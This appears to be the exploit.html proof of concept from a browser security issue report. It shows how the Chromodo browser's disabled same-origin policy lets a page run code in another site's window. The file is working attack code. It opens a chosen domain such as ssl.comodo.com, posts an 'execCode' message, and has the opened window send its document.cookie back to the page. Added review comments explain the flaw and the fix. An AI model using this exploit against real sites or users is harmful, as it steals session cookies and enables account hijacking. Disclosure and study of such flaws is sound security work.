
Issue 704 attachment: exploit.html (1.3 KB)

<html>
<head></head>
<body>
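<!-- Test page controls. The button at the bottom opens the address typed into
     #target in a new window and hands that window to steal_cookie(). -->
<p>
  The chromodo browser disables the same origin policy, use this page to test.
  <br>
  <a href="https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php">https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php</a>
</p>
<p>
  <label for="target">Domain you would like to access:</label>
  <input id="target" value="http://ssl.comodo.com/" size="32">
</p>
<p>
  <!-- NOTE(review): the script on this page never reads #code; the string it
       sends is fixed to document.cookie regardless of what is typed here. -->
  <label for="code">Code you would like to run:</label>
  <input id="code" value="document.cookie" size="32">
</p>
<p>
  <label for="result">Output will appear here:</label>
</p>
<!-- receive() writes the returned value into this box. The original markup had
     a stray closing p tag after the textarea; it is dropped here. -->
<textarea id="result" cols="64" rows="10"></textarea>
<p>
  <!-- There is no enclosing form, so nothing is submitted; the click handler
       is the only effect of this control. -->
  <input type="submit" onclick="steal_cookie(window.open(document.getElementById('target').value))">
</p>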
<script>

// Result sink: takes the escape()-encoded value reported by the target window,
// decodes it and shows it in the #result textarea. Nothing in this file calls
// it directly; its name only appears inside the string built by steal_cookie().
// unescape()/escape() are legacy functions, kept here because the sending side
// encodes with escape().
function receive(result)
{
    var outputBox = document.getElementById('result');
    var decoded = unescape(result);
    outputBox.value = decoded;
}

// Dispatch exploit message, and send result back.
//
// obj is the window handle returned by window.open() in the submit button's
// onclick handler. After a fixed delay this posts a JSON message of the form
// {command: "execCode", code: <string>} to that window.
//
// NOTE(review): nothing in this file listens for "message" events or
// interprets "execCode"; presumably that handler is supplied by the browser
// under test and evaluates the `code` field. Confirm against the issue text.
// The weakness being demonstrated sits on that receiving side: a handler that
// runs message contents without checking the sender's origin. The fix belongs
// there (validate event.origin, never evaluate message data).
function steal_cookie(obj)
{
// If evaluated in the opened window, the string below builds a second command
// of the form receive("<escaped document.cookie>"), posts it back to
// window.opener as another execCode message, and then closes the window.
// The payload is fixed to document.cookie; the #code input on the page is not
// read anywhere. document.cookie only exposes cookies not marked HttpOnly.
// `code` is assigned without var/let, so it becomes an implicit global.
code = "cmd='receive(" + '"' + "' + escape(document.cookie) +'" + '"' + ");';"
+ "window.opener.postMessage(JSON.stringify({command: 'execCode', code: cmd}), '*');"
+ "window.close();"

// Logged so the exact string sent can be inspected in the console.
console.log(code);
// Wait for the page to load. This is a fixed 2000 ms delay, not a load event,
// so a slow target may not be ready when the message is posted.
// The "*" targetOrigin places no restriction on the recipient's origin.
setTimeout(function() {
obj.postMessage(JSON.stringify({
command: "execCode",
code: code,
}), "*");
}, 2000);
}
</script>
</body>
</html>